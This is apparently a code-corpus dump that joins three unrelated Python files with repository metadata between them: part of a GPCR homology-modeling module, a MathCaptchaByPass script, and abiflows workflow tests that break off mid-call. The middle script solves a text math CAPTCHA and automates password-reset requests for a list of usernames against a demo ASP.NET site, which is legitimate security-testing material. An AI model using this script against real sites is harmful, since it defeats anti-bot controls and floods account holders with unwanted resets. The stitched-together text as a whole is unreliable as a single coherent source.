list(Residue.objects.filter(protein_conformation__protein=self.reference_protein, protein_segment__slug='ECL2')) # correct for 1 res longer template ref_x50_i = ref_residues.index([i for i in ref_residues if i.generic_number!=None and ggn(i.display_generic_number.label)=='45x50'][0]) if len(ref_residues)<len(self.main_pdb_array['ECL2']): if loop_output_structure[0]!=None: dif = len(list(self.main_pdb_array['ECL2'].keys())[:x50_i])-len(ref_residues[:ref_x50_i]) ref_residues = ref_residues[:ref_x50_i] + list(dif*'-') + ref_residues[ref_x50_i:] if loop_output_structure[2]!=None: pdb_array_x50_i = list(self.main_pdb_array['ECL2'].keys()).index('45.50') dif = len(list(self.main_pdb_array['ECL2'].keys())[pdb_array_x50_i+3:])-len(ref_residues[ref_x50_i+3:]) ref_residues = ref_residues[:ref_x50_i+3] + list(dif*'-') + ref_residues[ref_x50_i+3:] elif len(ref_residues)>len(self.main_pdb_array['ECL2']): if loop_output_structure[0]==self.main_structure: dif = len(ref_residues[:ref_x50_i])-len(list(self.main_pdb_array['ECL2'].keys())[:x50_i]) temp_array = OrderedDict() for i in list(self.main_pdb_array['ECL2'])[:x50_i]: temp_array[i] = self.main_pdb_array['ECL2'][i] if '|' in i: s = i.split('|') elif '?': s = i.split('?') num = int(s[1]) for i in range(0,dif): temp_array[s[0]+'?'+str(num+1)] = '-' num+=1 for i in list(self.main_pdb_array['ECL2'])[x50_i:x50_i+3]: temp_array[i] = self.main_pdb_array['ECL2'][i] num+=1 if loop_output_structure[2]==self.main_structure: dif = len(ref_residues[ref_x50_i+3:])-len(list(self.main_pdb_array['ECL2'].keys())[x50_i+3:]) for i in range(0,dif): temp_array['ECL2'+'?'+str(num+1)] ='-' num+=1 for i in list(self.main_pdb_array['ECL2'])[x50_i+3:]: temp_array['ECL2'+i[4]+str(num)] = self.main_pdb_array['ECL2'][i] num+=1 self.main_pdb_array['ECL2'] = temp_array for ref_seg, temp_seg, aligned_seg in zip(reference_dict, template_dict, alignment_dict): if ref_seg[0]=='T' and self.segment_order.index(self.loop_label)-self.segment_order.index(ref_seg[:4])==1: temp_ref_dict[ref_seg] = reference_dict[ref_seg] temp_temp_dict[temp_seg] = template_dict[temp_seg] temp_aligned_dict[aligned_seg] = alignment_dict[aligned_seg] temp_ref_dict['ECL2'],temp_temp_dict['ECL2'],temp_aligned_dict['ECL2'] = OrderedDict(),OrderedDict(),OrderedDict() for ref, key in 
zip(ref_residues, self.main_pdb_array['ECL2']): try: temp_ref_dict['ECL2'][key.replace('.','x')] = ref.amino_acid except: temp_ref_dict['ECL2'][key.replace('.','x')] = '-' try: temp_temp_dict['ECL2'][key.replace('.','x')] = PDB.Polypeptide.three_to_one( self.main_pdb_array['ECL2'][key][0].get_parent().get_resname()) except: temp_temp_dict['ECL2'][key.replace('.','x')] = self.main_pdb_array['ECL2'][key] if temp_ref_dict['ECL2'][key.replace('.','x')]==temp_temp_dict['ECL2'][key.replace('.','x')]: temp_aligned_dict['ECL2'][key.replace('.','x')] = temp_ref_dict['ECL2'][key.replace('.','x')] elif temp_temp_dict['ECL2'][key.replace('.','x')]=='x': temp_aligned_dict['ECL2'][key.replace('.','x')] = 'x' elif temp_temp_dict['ECL2'][key.replace('.','x')]=='-': temp_aligned_dict['ECL2'][key.replace('.','x')] = '-' else: temp_aligned_dict['ECL2'][key.replace('.','x')] = '.' else: if temp_seg=='ECL2': continue temp_ref_dict[ref_seg] = reference_dict[ref_seg] temp_temp_dict[temp_seg] = template_dict[temp_seg] temp_aligned_dict[aligned_seg] = alignment_dict[aligned_seg] self.reference_dict = temp_ref_dict self.template_dict = temp_temp_dict self.alignment_dict = temp_aligned_dict return self def gap_ECL2(self, main_pdb_array, loop_template, break_chain=False): temp_array, temp_loop = OrderedDict(), OrderedDict() for seg_label, gns in main_pdb_array.items(): if self.segment_order.index(self.loop_label)-self.segment_order.index(seg_label[:4])==1: temp_array[seg_label] = gns l_res = 0 for key in loop_template: l_res+=1 temp_loop[self.loop_label+'?'+str(l_res)] = '-' temp_array[self.loop_label] = temp_loop else: temp_array[seg_label] = gns return temp_array def compare_parent_loop_to_child(self, loop_label, structure, ignore_gns=False): l_res = list(Residue.objects.filter(protein_conformation=structure.protein_conformation, protein_segment__slug=loop_label)) l_p_conf = ProteinConformation.objects.get(protein=structure.protein_conformation.protein.parent) parent_res = list(Residue.objects.filter(protein_conformation=l_p_conf, protein_segment__slug=loop_label)) parent_seq_nums = [i.sequence_number for i in parent_res] l_res_gn = [ggn(i.display_generic_number.label) for i in l_res if i.generic_number!=None] parent_res_gn = [ggn(i.display_generic_number.label) for i in parent_res if i.generic_number!=None] if len(l_res)!=len(parent_res) and l_res_gn==parent_res_gn: return True, [i for i in l_res if i.sequence_number in parent_seq_nums] elif l_res_gn!=parent_res_gn: return False else: return True, l_res def cont_loop_insert_to_pdb(self, main_pdb_array, template_dict, loop_template, ECL2=None, x50_i=None): temp_array, temp_loop = OrderedDict(), OrderedDict() for seg_label, gns in main_pdb_array.items(): if self.segment_order.index(self.loop_label)-self.segment_order.index(seg_label[:4])==1: temp_array[seg_label] = gns l_res = 0 if self.partialECL2_1==True: for key in list(template_dict['ECL2'])[:x50_i]: l_res+=1 if key in loop_template: temp_loop[self.loop_label+'|'+str(l_res)] = loop_template[key] else: temp_loop[self.loop_label+'?'+str(l_res)] = '-' else: for key in loop_template: l_res+=1 if '.' 
in key: temp_loop[key] = loop_template[key] elif 'gap' in key: temp_loop[self.loop_label+'?'+str(l_res)] = loop_template[key] elif loop_template[key]=='-': temp_loop[self.loop_label+'?'+str(l_res)] = loop_template[key] else: temp_loop[self.loop_label+'|'+str(l_res)] = loop_template[key] if ECL2!=None: temp_array[self.loop_label] = temp_loop else: temp_array[self.loop_label+'_cont'] = temp_loop else: temp_array[seg_label] = gns return temp_array def discont_loop_insert_to_pdb(self, main_pdb_array, loop_template, loop_output_structure, ECL2=None, temp_dict=None): temp_array, temp_loop = OrderedDict(), OrderedDict() loop_keys = list(loop_template.keys())[1:-1] for seg_label, gns in main_pdb_array.items(): if self.segment_order.index(self.loop_label)-self.segment_order.index(seg_label[:4])==1: temp_array[seg_label] = gns l_res = 1 temp_loop[self.loop_label+'?'+'1'] = 'x' if temp_dict!=None and self.loop_label in temp_dict: iter_list = [i.replace('x','.') for i in temp_dict[self.loop_label]][1:-1] if len(loop_keys)>len(iter_list): iter_list = loop_keys else: iter_list = loop_keys for key in iter_list: l_res+=1 try: try: loop_gn = ggn(Residue.objects.get(protein_conformation=loop_output_structure.protein_conformation, display_generic_number__label=dgn(key.replace('.','x'), loop_output_structure.protein_conformation)).display_generic_number.label).replace('x','.') except: loop_gn = ggn(Residue.objects.get(protein_conformation=loop_output_structure.protein_conformation, sequence_number=key).display_generic_number.label.replace('x','.')) if len(loop_gn.split('.')[0])==1: raise Exception() if '.' in loop_gn: Residue.objects.get(protein_conformation=self.prot_conf, display_generic_number__label=dgn(loop_gn.replace('.','x'),self.prot_conf)) temp_loop[loop_gn] = loop_template[key] except: try: if loop_template[key]=='-': raise Exception() temp_loop[self.loop_label+'|'+str(l_res)] = loop_template[key] except: temp_loop[self.loop_label+'?'+str(l_res)] = '-' temp_loop[self.loop_label+'?'+str(l_res+1)] = 'x' if ECL2!=None: temp_array[self.loop_label] = temp_loop else: temp_array[self.loop_label+'_dis'] = temp_loop else: temp_array[seg_label] = gns return temp_array def insert_gaps_for_loops_to_arrays(self, main_pdb_array, reference_dict, template_dict, alignment_dict): ''' When there is no template for a loop region, this function inserts gaps for that region into the main template, fetches the reference residues and inserts these into the arrays. This allows for Modeller to freely model these loop regions. @param main_pdb_array: nested OrderedDict(), output of GPCRDBParsingPDB().pdb_array_creator(). @param reference_dict: reference dictionary of AlignedReferenceTemplate. @param template_dict: template dictionary of AlignedReferenceTemplate. @param alignment_dict: alignment dictionary of AlignedReferenceTemplate. 
''' residues = Residue.objects.filter(protein_conformation__protein=self.reference_protein, protein_segment__slug=self.loop_label) temp_pdb_array = OrderedDict() for seg_id, seg in main_pdb_array.items(): if self.segment_order.index(self.loop_label)-self.segment_order.index(seg_id[:4])==1: temp_loop = OrderedDict() count=0 temp_pdb_array[seg_id] = seg for r in residues: count+=1 temp_loop[self.loop_label+'?'+str(count)] = '-' temp_pdb_array[self.loop_label+'_free'] = temp_loop self.new_label = self.loop_label+'_free' else: temp_pdb_array[seg_id] = seg self.main_pdb_array = temp_pdb_array temp_ref_dict, temp_temp_dict, temp_aligned_dict = OrderedDict(), OrderedDict(), OrderedDict() for ref_seg, temp_seg, aligned_seg in zip(reference_dict, template_dict, alignment_dict): if ref_seg=='H8' and len(list(Residue.objects.filter(protein_conformation=self.prot_conf, protein_segment__slug='H8')))==0: continue if self.segment_order.index(self.loop_label)-self.segment_order.index(ref_seg[:4])==1: temp_ref_loop, temp_temp_loop, temp_aligned_loop = OrderedDict(), OrderedDict(), OrderedDict() temp_ref_dict[ref_seg] = reference_dict[ref_seg] temp_temp_dict[temp_seg] = template_dict[temp_seg] temp_aligned_dict[aligned_seg] = alignment_dict[aligned_seg] count=0 for r in residues: count+=1 temp_ref_loop[self.loop_label+'?'+str(count)] = r.amino_acid temp_temp_loop[self.loop_label+'?'+str(count)] = '-' temp_aligned_loop[self.loop_label+'?'+str(count)] = '.' temp_ref_dict[self.loop_label+'_free'] = temp_ref_loop temp_temp_dict[self.loop_label+'_free'] = temp_temp_loop temp_aligned_dict[self.loop_label+'_free'] = temp_aligned_loop else: temp_ref_dict[ref_seg] = reference_dict[ref_seg] temp_temp_dict[temp_seg] = template_dict[temp_seg] temp_aligned_dict[aligned_seg] = alignment_dict[aligned_seg] self.reference_dict = temp_ref_dict self.template_dict = temp_temp_dict self.alignment_dict = temp_aligned_dict class Bulges(object): ''' Class to handle bulges in GPCR structures. ''' def __init__(self, gn): self.gn = gn self.bulge_templates = [] self.template = None def check_range(self, gn_list, protein_conformation, num): check = [dgn(i,protein_conformation) for i in gn_list] check_list = [i.sequence_number for i in list(Residue.objects.filter(protein_conformation=protein_conformation, display_generic_number__label__in=check))] ref_list = list(range(check_list[0],check_list[0]+num)) if ref_list==check_list: return 1 else: return 0 def find_bulge_template(self, similarity_table, bulge_in_reference): ''' Searches for bulge template, returns residues of template (5 residues if the bulge is in the reference, 4 residues if the bulge is in the template). @param gn: str, Generic number of bulge, e.g. 1x411 \n @param similarity_table: OrderedDict(), table of structures ordered by preference. Output of HomologyModeling().create_similarity_table(). \n @param bulge_in_reference: boolean, Set it to True if the bulge is in the reference, set it to False if the bulge is in the template. 
''' gn = self.gn parse = GPCRDBParsingPDB() for structure, value in similarity_table.items(): anomaly_list = structure.protein_anomalies.all().prefetch_related() this_anomaly = ProteinAnomaly.objects.filter(generic_number__label=gn) if bulge_in_reference==True: try: for anomaly in this_anomaly: if anomaly in anomaly_list: gn_list = [parse.gn_indecer(gn,'x',-2), parse.gn_indecer(gn,'x',-1), gn, parse.gn_indecer(gn,'x',+1), parse.gn_indecer(gn,'x',+2)] if self.check_range(gn_list,structure.protein_conformation,5)==0: raise Exception() alt_bulge = parse.fetch_residues_from_pdb(structure, gn_list) self.template = structure return alt_bulge except: pass elif bulge_in_reference==False: try: suitable_temp = [] for anomaly in this_anomaly: if anomaly not in anomaly_list: pass else: suitable_temp.append('no') if 'no' not in suitable_temp: gn_list = [parse.gn_indecer(gn,'x',-2), parse.gn_indecer(gn,'x',-1), parse.gn_indecer(gn,'x',+1), parse.gn_indecer(gn,'x',+2)] if self.check_range(gn_list,structure.protein_conformation,4)==0: raise Exception() alt_bulge = parse.fetch_residues_from_pdb(structure, gn_list) self.template = structure return alt_bulge except: pass return None class Constrictions(Bulges): ''' Class to handle constrictions in GPCRs. ''' def __init__(self, gn): self.gn = gn self.constriction_templates = [] self.template = None def find_constriction_template(self, similarity_table, constriction_in_reference): ''' Searches for constriction template, returns residues of template (4 residues if the constriction is in the reference, 5 residues if the constriction is in the template). @param gn: str, Generic number of constriction, e.g. 7x44 \n @param similarity_table: OrderedDict(), table of structures ordered by preference. Output of HomologyModeling().create_similarity_table(). \n @param constriction_in_reference: boolean, Set it to True if the constriction is in the reference, set it to False if the constriction is in the template. ''' gn = self.gn parse = GPCRDBParsingPDB() for structure, value in similarity_table.items(): this_anomaly = ProteinAnomaly.objects.filter(generic_number__label=gn) anomaly_list = structure.protein_anomalies.all().prefetch_related() if constriction_in_reference==True: try: for anomaly in this_anomaly: if anomaly in anomaly_list: gn_list = [parse.gn_indecer(gn,'x',-2), parse.gn_indecer(gn,'x',-1), parse.gn_indecer(gn,'x',+1), parse.gn_indecer(gn,'x',+2)] if self.check_range(gn_list,structure.protein_conformation,4)==0: raise Exception() alt_const = parse.fetch_residues_from_pdb(structure, gn_list) self.template = structure return alt_const except: pass elif constriction_in_reference==False: try: suitable_temp = [] for anomaly in this_anomaly: if anomaly not in anomaly_list: pass else: suitable_temp.append('no') if 'no' not in suitable_temp: gn_list = [parse.gn_indecer(gn,'x',-2), parse.gn_indecer(gn,'x',-1), gn, parse.gn_indecer(gn,'x',+1), parse.gn_indecer(gn,'x',+2)] if self.check_range(gn_list,structure.protein_conformation,5)==0: raise Exception() alt_const = parse.fetch_residues_from_pdb(structure, gn_list) self.template = structure return alt_const except: pass return None class GPCRDBParsingPDB(object): ''' Class to manipulate cleaned pdb files of GPCRs. ''' def __init__(self): self.segment_coding = OrderedDict([(1,'TM1'),(2,'TM2'),(3,'TM3'),(4,'TM4'),(5,'TM5'),(6,'TM6'),(7,'TM7'),(8,'H8')]) def gn_num_extract(self, gn, delimiter): ''' Extract TM number and position for formatting. 
@param gn: str, Generic number \n @param delimiter: str, character between TM and position (usually 'x') ''' try: split = gn.split(delimiter) return int(split[0]), int(split[1]) except: try: split = gn.split(delimiter) return split[0], int(split[1]) except: return '/', '/' def gn_comparer(self, gn1, gn2, protein_conformation): ''' ''' res1 = Residue.objects.get(protein_conformation=protein_conformation, display_generic_number__label=dgn(gn1,protein_conformation)) res2 = Residue.objects.get(protein_conformation=protein_conformation, display_generic_number__label=dgn(gn2,protein_conformation)) return res1.sequence_number-res2.sequence_number def gn_indecer(self, gn, delimiter, direction): ''' Get an upstream or downstream generic number from reference generic number. @param gn: str, Generic number \n @param delimiter: str, character between TM and position (usually 'x') \n @param direction: int, n'th position from gn (+ or -) ''' split = self.gn_num_extract(gn, delimiter) if len(str(split[1]))==2: return str(split[0])+delimiter+str(split[1]+direction) elif len(str(split[1]))==3: if direction<0: direction += 1 return str(split[0])+delimiter+str(int(str(split[1])[:2])+direction) def fetch_residues_from_pdb(self, structure, generic_numbers, modify_bulges=False, just_nums=False): ''' Fetches specific lines from pdb file by generic number (if generic number is not available then by residue number). Returns nested OrderedDict() with generic numbers as keys in the outer dictionary, and atom names as keys in the inner dictionary. @param structure: Structure, Structure object where residues should be fetched from \n @param generic_numbers: list, list of generic numbers to be fetched \n @param modify_bulges: boolean, set it to true when used for bulge switching. E.g. you want a 5x461 residue to be considered a 5x46 residue. 
''' output = OrderedDict() atoms_list = [] for gn in generic_numbers: rotamer=None if 'x' in str(gn): rotamer = list(Rotamer.objects.filter(structure__protein_conformation=structure.protein_conformation, residue__display_generic_number__label=dgn(gn,structure.protein_conformation), structure__preferred_chain=structure.preferred_chain)) else: rotamer = list(Rotamer.objects.filter(structure__protein_conformation=structure.protein_conformation, residue__sequence_number=gn, structure__preferred_chain=structure.preferred_chain)) if just_nums==False: try: gn = ggn(Residue.objects.get(protein_conformation=structure.protein_conformation, sequence_number=gn).display_generic_number.label) except: pass if len(rotamer)>1: for i in rotamer: if i.pdbdata.pdb.startswith('COMPND')==False: if i.pdbdata.pdb[21] in structure.preferred_chain: rotamer = i break else: rotamer = rotamer[0] io = StringIO(rotamer.pdbdata.pdb) rota_struct = PDB.PDBParser(QUIET=True).get_structure('structure', io)[0] for chain in rota_struct: for residue in chain: for atom in residue: atoms_list.append(atom) if modify_bulges==True and len(gn)==5: output[gn.replace('x','.')[:-1]] = atoms_list else: try: output[gn.replace('x','.')] = atoms_list except: output[str(gn)] = atoms_list atoms_list = [] return output def fetch_residues_from_array(self, main_pdb_array_segment, list_of_gns): array = OrderedDict() for i in list_of_gns: array[i.replace('x','.')] = main_pdb_array_segment[i.replace('x','.')] return array def add_two_ordereddict(self, dict1, dict2): output = OrderedDict() for i,j in dict1.items(): output[i] = j for i,j in dict2.items(): output[i] = j return output def pdb_array_creator(self, structure=None, filename=None): ''' Creates an OrderedDict() from the pdb of a Structure object where residue numbers/generic numbers are keys for the residues, and atom names are keys for the Bio.PDB.Residue objects. @param structure: Structure, Structure object of protein. When using structure, leave filename=None. \n @param filename: str, filename of pdb to be parsed. When using filename, leave structure=None). 
''' seq_nums_overwrite_cutoff_dict = {'4PHU':2000, '4LDL':1000, '4LDO':1000, '4QKX':1000, '5JQH':1000, '5TZY':2000} if structure!=None and filename==None: io = StringIO(structure.pdb_data.pdb) else: io = filename gn_array = [] residue_array = [] # pdb_struct = PDB.PDBParser(QUIET=True).get_structure(structure.pdb_code.index, io)[0] residues = Residue.objects.filter(protein_conformation=structure.protein_conformation) gn_list = [] for i in residues: try: gn_list.append(ggn(i.display_generic_number.label).replace('x','.')) except: pass assign_gn = as_gn.GenericNumbering(pdb_file=io, pdb_code=structure.pdb_code.index, sequence_parser=True) pdb_struct = assign_gn.assign_generic_numbers_with_sequence_parser() pref_chain = structure.preferred_chain parent_prot_conf = ProteinConformation.objects.get(protein=structure.protein_conformation.protein.parent) parent_residues = Residue.objects.filter(protein_conformation=parent_prot_conf) last_res = list(parent_residues)[-1].sequence_number if len(pref_chain)>1: pref_chain = pref_chain[0] for residue in pdb_struct[pref_chain]: try: if -9.1 < residue['CA'].get_bfactor() < 9.1: gn = str(residue['CA'].get_bfactor()) if len(gn.split('.')[1])==1: gn = gn+'0' if gn[0]=='-': gn = gn[1:]+'1' # Exception for 3PBL 331, gn get's assigned wrong if structure.pdb_code.index=='3PBL' and residue.get_id()[1]==331: raise Exception() ################################################# if gn in gn_list: if int(residue.get_id()[1])>1000: if structure.pdb_code.index in seq_nums_overwrite_cutoff_dict and int(residue.get_id()[1])>=seq_nums_overwrite_cutoff_dict[structure.pdb_code.index]: gn_array.append(gn) residue_array.append(residue.get_list()) else: raise Exception() else: gn_array.append(gn) residue_array.append(residue.get_list()) else: raise Exception() else: raise Exception() except: if structure!=None and structure.pdb_code.index in seq_nums_overwrite_cutoff_dict: if int(residue.get_id()[1])>seq_nums_overwrite_cutoff_dict[structure.pdb_code.index]: gn_array.append(str(int(str(residue.get_id()[1])[1:]))) else: gn_array.append(str(residue.get_id()[1])) else: gn_array.append(str(residue.get_id()[1])) residue_array.append(residue.get_list()) output = OrderedDict() for num, label in self.segment_coding.items(): output[label] = OrderedDict() if len(gn_array)!=len(residue_array): raise AssertionError() for gn, res in zip(gn_array,residue_array): if '.' 
in gn: seg_num = int(gn.split('.')[0]) seg_label = self.segment_coding[seg_num] if seg_num==8 and len(output['TM7'])==0: continue else: output[seg_label][gn] = res else: try: found_res, found_gn = None, None try: found_res = Residue.objects.get(protein_conformation=structure.protein_conformation, sequence_number=gn) except: # Exception for res 317 in 5VEX, 5VEW if structure.pdb_code.index in ['5VEX','5VEW'] and gn=='317' and res[0].get_parent().get_resname()=='CYS': found_res = Residue.objects.get(protein_conformation=parent_prot_conf, sequence_number=gn) ##################################### found_gn = str(ggn(found_res.display_generic_number.label)).replace('x','.') # Exception for res 318 in 5VEX, 5VEW if structure.pdb_code.index in ['5VEX','5VEW'] and gn=='318' and res[0].get_parent().get_resname()=='ILE' and found_gn=='5.47': found_gn = '5.48' ##################################### if -9.1 < float(found_gn) < 9.1: if len(res)==1: continue if int(gn)>last_res: continue seg_label = self.segment_coding[int(found_gn.split('.')[0])] output[seg_label][found_gn] = res except: if res[0].get_parent().get_resname()=='YCM' or res[0].get_parent().get_resname()=='CSD': found_res = Residue.objects.get(protein_conformation=parent_prot_conf, sequence_number=gn) if found_res.protein_segment.slug[0] not in ['T','H']: continue try: found_gn = str(ggn(found_res.display_generic_number.label)).replace('x','.') except: found_gn = str(gn) output[found_res.protein_segment.slug][found_gn] = res return output class CreateStatistics(object): ''' Statistics dictionary for HomologyModeling. ''' def __init__(self, reference): self.reference = reference self.info_dict = OrderedDict() def __repr__(self): return "<{} \n {} \n>".format(self.reference, self.info_dict) def items(self): ''' Returns the OrderedDict().items(). ''' return self.info_dict.items() def add_info(self, info_name, info): ''' Adds new information to the statistics dictionary. @param info_name: str, info name as dictionary key @param info: object, any object as value ''' self.info_dict[info_name] = info
fosfataza/protwis
build_gpcr/management/commands/build_homology_models.py
Python
apache-2.0
254326
[ "CRYSTAL" ]
8539c147f5f4184231280dab921bea1be52864ce32681f4d5fb45a5efa6319f7
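The homology-modeling code above leans heavily on GPCRdb generic numbers such as '5x46' and on helpers like gn_num_extract and gn_indecer to step along a helix. The snippet below is a hypothetical, self-contained sketch of that position arithmetic, including the collapse of three-digit bulge labels such as '5x461'; it mirrors the logic of gn_indecer but is not the repository's actual helper.

# Hypothetical sketch of GPCRdb-style generic-number arithmetic; the helper
# name gn_shift is invented for illustration and mirrors gn_indecer above.
def gn_shift(gn, delimiter='x', direction=1):
    """Shift a generic number like '5x46' by `direction` positions."""
    tm, pos = gn.split(delimiter)
    if len(pos) == 3:
        # Three-digit bulge positions such as '5x461' collapse to the
        # parent two-digit position before stepping, as gn_indecer does.
        pos = pos[:2]
        if direction < 0:
            direction += 1
    return '{}{}{}'.format(tm, delimiter, int(pos) + direction)

print(gn_shift('5x46', direction=2))    # 5x48
print(gn_shift('5x461', direction=-1))  # 5x46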
__license__ = """ MathCaptchaByPass.py is a free script to test the bypassing of a text-based math CAPTCHA. Along with this script you will find an ASP .NET Web Forms site to test the script against. Author: Rich Grimes Twitter: @saltyCoder Copyright (C) 2014 by Rich Grimes This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. """ class TextColors: FAIL = '\033[91m' END = '\033[0m' def disable(self): self.FAIL = '' self.END = '' import re import argparse """ Verify that Python 3 is installed """ import sys if sys.version_info < (3, 0, 0): print('\n{0}Python 3 is needed to run this script. Visit the Python download page to install Python 3: ' 'https://www.python.org/downloads{1}'.format(TextColors.FAIL, TextColors.END)) print('\n{0}Linux users can use: apt-get install python3-requests{1}\n'.format(TextColors.FAIL, TextColors.END)) exit(1) """ Lets make sure the Request library is installed (http://docs.python-requests.org/en/latest) """ try: import requests except ImportError: print('\n{0}You will need to install the Python Requests library to run this script. Visit ' 'the Python Request site for installation directions: ' 'http://docs.python-requests.org/en/latest.{1}'.format(TextColors.FAIL, TextColors.END)) exit(1) def math_captcha_bypass(userName, url, proxy): try: from bs4 import BeautifulSoup from urllib.parse import urlparse # Create the Proxy Server. 
Example: {'http': 'http://127.0.0.1:8080'} o = urlparse(proxy) proxies = {o.scheme: o.geturl()} # Determine if we are using a proxy and make the HTTP Request if len(proxy) < 1: proxies = None # Establish Session and Make HTTP Request s = requests.Session() s.get(url, proxies=proxies, allow_redirects=True, verify=False) r = s.get(url, proxies=proxies, allow_redirects=True, verify=False) # Load Response into BeautifulSoup soup = BeautifulSoup(r.text) #print(soup.prettify()) # Get the Math CAPTCHA Question str = soup.select('label[for="txtCaptcha"]') # Extract the numbers from the question n = [] n = re.findall(r'\d+', str[0].text) answer = int(n[0]) + int(n[1]) print('\nCaptcha: {0} {1}'.format(str[0].text, answer)) # For the demo we are using ASP.NET Webforms so we must send the # view state and event validation fields in the POST Request viewState = soup.select('input[id="__VIEWSTATE"]') eventVal = soup.select('input[id="__EVENTVALIDATION"]') # Create the HTTP POST Body and send Request payload = {'__VIEWSTATE': viewState[0]['value'], '__EVENTVALIDATION': eventVal[0]['value'], 'UserName': userName, 'txtCaptcha': answer, 'Reset': 'Reset+Password'} r = s.post(url, proxies=proxies, data=payload, allow_redirects=True, verify=False) # Read the Response and display the demo message soup = BeautifulSoup(r.text) msg = soup.select('div[id="Message"]') if 'password' in msg[0].text: print('{0}{1} - {2}{3}'.format(TextColors.FAIL, userName, msg[0].text, TextColors.END)) else: print('{0} - {1}'.format(userName, msg[0].text)) # Close out session s.close() except ImportError: print("Import Error") def main(): url = 'http://192.168.61.128/captcha/' parse = argparse.ArgumentParser() parse.add_argument('-proxy', action='store', dest='proxy', required=False, help='Enter in the address of the proxy. For example: http://127.0.0.1:8080') args = parse.parse_args() proxy = str(args.proxy) userNames = ['DonaldDuck', 'MickeyMouse', 'JohnDoe', 'HappyGilmore'] for p in userNames: math_captcha_bypass(p, url, proxy) if __name__ == "__main__": main()
saltycoder/MathCaptchaByPass
MathCaptchaByPass.py
Python
gpl-3.0
4607
[ "VisIt" ]
7ad2488d35dc5c943cd2b1230af84483ca8700f77a38244b3f0f660d28cccf64
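The core trick of the script above is that the CAPTCHA is plain text, so its two operands can be recovered with a regex and summed. A minimal standalone sketch of that parsing step follows; the question string is made up for illustration, and like the script it only handles addition with two operands.

# Minimal sketch of the CAPTCHA-parsing step used above: pull the two
# operands out of the question text with a regex and sum them.
import re

question = "What is 7 + 15?"       # hypothetical question text
numbers = re.findall(r'\d+', question)
answer = int(numbers[0]) + int(numbers[1])
print(answer)                      # 22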
""" Tests for the Abinit workflows classes. The tests require abipy's factories to run, so abipy should be configured and abinit available. """ from __future__ import print_function, division, unicode_literals, absolute_import import os import unittest import abipy.data as abidata import abipy.abilab as abilab from abipy.abio.factories import scf_input from abiflows.core.testing import AbiflowsTest, has_mongodb, TESTDB_NAME from abiflows.database.mongoengine.utils import DatabaseData from abiflows.fireworks.workflows.abinit_workflows import * class TestBaseClassMethods(AbiflowsTest): @classmethod def setUpClass(cls): cls.si_structure = abilab.Structure.from_file(abidata.cif_file("si.cif")) cls.scf_inp = scf_input(cls.si_structure, abidata.pseudos("14si.pspnc"), ecut=2, kppa=10) cls.setup_fireworks() @classmethod def tearDownClass(cls): cls.teardown_fireworks() def setUp(self): self.scf_wf = ScfFWWorkflow(self.scf_inp) def tearDown(self): if self.lp: self.lp.reset(password=None,require_password=False) def test_add_fws(self): assert len(self.scf_wf.wf.fws) == 1 self.scf_wf.add_final_cleanup(out_exts=["WFK", "DEN"]) assert len(self.scf_wf.wf.fws) == 2 self.scf_wf.add_mongoengine_db_insertion(DatabaseData(TESTDB_NAME)) assert len(self.scf_wf.wf.fws) == 3 self.scf_wf.add_cut3d_den_to_cube_task() assert len(self.scf_wf.wf.fws) == 4 def test_fireworks_methods(self): self.scf_wf.add_metadata(self.si_structure, {"test": 1}) assert "nsites" in self.scf_wf.wf.metadata self.scf_wf.fix_fworker("test_worker") self.scf_wf.get_reduced_formula(self.scf_inp) self.scf_wf.set_short_single_core_to_spec() self.scf_wf.set_preserve_fworker() self.scf_wf.add_spec_to_all_fws({"test_spec": 1}) @unittest.skipUnless(has_mongodb(), "A local mongodb is required.") def test_add_to_db(self): self.scf_wf.add_to_db(self.lp) class TestFromFactory(AbiflowsTest): @classmethod def setUpClass(cls): cls.gan_structure = abilab.Structure.from_file(abidata.cif_file("gan.cif")) cls.gan_pseudos = [abidata.pseudos("31ga.pspnc").pseudo_with_symbol('Ga'), abidata.pseudos("7n.pspnc").pseudo_with_symbol('N')] def test_scf_workflow(self): ScfFWWorkflow.from_factory(self.gan_structure, self.gan_pseudos, ecut=4, spec={"test": 1}, initialization_info={"test": 1}) ScfFWWorkflow.from_factory(self.gan_structure, self.gan_pseudos, ecut=4, spec={"test": 1}, initialization_info={"test": 1}, autoparal=True) def test_phonon_workflow(self): PhononFWWorkflow.from_factory(self.gan_structure, self.gan_pseudos, ecut=4, spec={"test": 1}, initialization_info={"test": 1}, ph_ngqpt=[2,2,2]) PhononFWWorkflow.from_factory(self.gan_structure, self.gan_pseudos, ecut=4, spec={"test": 1}, initialization_info={"test": 1}, ph_ngqpt=[2,2,2], autoparal=True) PhononFullFWWorkflow.from_factory(self.gan_structure, self.gan_pseudos, ecut=4, spec={"test": 1}, initialization_info={"test": 1}, qpoints=[[0.1,0,0]]) def test_dte_workflow(self): DteFWWorkflow.from_factory(self.gan_structure, self.gan_pseudos, ecut=4, smearing=None, spin_mode="unpolarized", spec={"test": 1}, initialization_info={"test": 1}, extra_abivars={"ixc": 7}) DteFWWorkflow.from_factory(self.gan_structure, self.gan_pseudos, ecut=4, smearing=None, spin_mode="unpolarized", spec={"test": 1}, initialization_info={"test": 1}, extra_abivars={"ixc": 7}, autoparal=True) def test_relax_workflow(self): RelaxFWWorkflow.from_factory(self.gan_structure, self.gan_pseudos, ecut=4, spec={"test": 1}, initialization_info={"test": 1}) RelaxFWWorkflow.from_factory(self.gan_structure, self.gan_pseudos, ecut=4, spec={"test": 1}, 
